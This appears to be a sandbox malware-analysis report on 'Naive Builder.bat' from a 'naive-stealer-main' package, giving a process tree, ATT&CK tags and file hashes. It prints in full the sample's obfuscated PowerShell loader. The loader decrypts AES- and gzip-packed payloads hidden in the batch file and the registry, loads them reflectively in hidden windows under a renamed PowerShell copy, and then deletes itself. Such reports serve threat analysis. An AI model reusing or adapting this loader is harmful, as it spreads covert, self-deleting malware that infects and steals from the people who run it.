C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat"2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2140
-
-
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:5096
-
-
-
C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mJkVt($luVLu){ $XURkq=[System.Security.Cryptography.Aes]::Create(); $XURkq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XURkq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XURkq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EJfVxric5nYI0sCifeM7QtCynXluiHdjC3MMcb2UUrA='); $XURkq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IIC8RBkY6uF/2e5D1cUgfg=='); $XhpAT=$XURkq.CreateDecryptor(); $return_var=$XhpAT.TransformFinalBlock($luVLu, 0, $luVLu.Length); $XhpAT.Dispose(); $XURkq.Dispose(); $return_var;}function hLEOv($luVLu){ $SBbXV=New-Object System.IO.MemoryStream(,$luVLu); $RlXKT=New-Object System.IO.MemoryStream; $XPinw=New-Object System.IO.Compression.GZipStream($SBbXV, [IO.Compression.CompressionMode]::Decompress); $XPinw.CopyTo($RlXKT); $XPinw.Dispose(); $SBbXV.Dispose(); $RlXKT.Dispose(); $RlXKT.ToArray();}function tzqfR($luVLu,$MCcIJ){ $VEHZu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$luVLu); $cUkGe=$VEHZu.EntryPoint; $cUkGe.Invoke($null, $MCcIJ);}$flgbs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat').Split([Environment]::NewLine);foreach ($zFvRn in $flgbs) { if ($zFvRn.StartsWith(':: ')) { $TRCCB=$zFvRn.Substring(4); break; }}$YrvSK=[string[]]$TRCCB.Split('\');$xplph=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[0])));$vNzEy=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[1])));tzqfR $vNzEy (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));tzqfR $xplph (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = [Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(820).WaitForExit();[System.Threading.Thread]::Sleep(5000); function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = [Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2444 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3484
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4692
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Kills process with taskkill
PID:3240
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Views/modifies file attributes
PID:4488
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3568
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3736
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:436
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4332
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2696
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2988
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3360
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1960
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3948
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3456
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:3940
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
1Hidden Window
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
160KB
MD53e2fa187cc14eeafe172a66adcf1163a
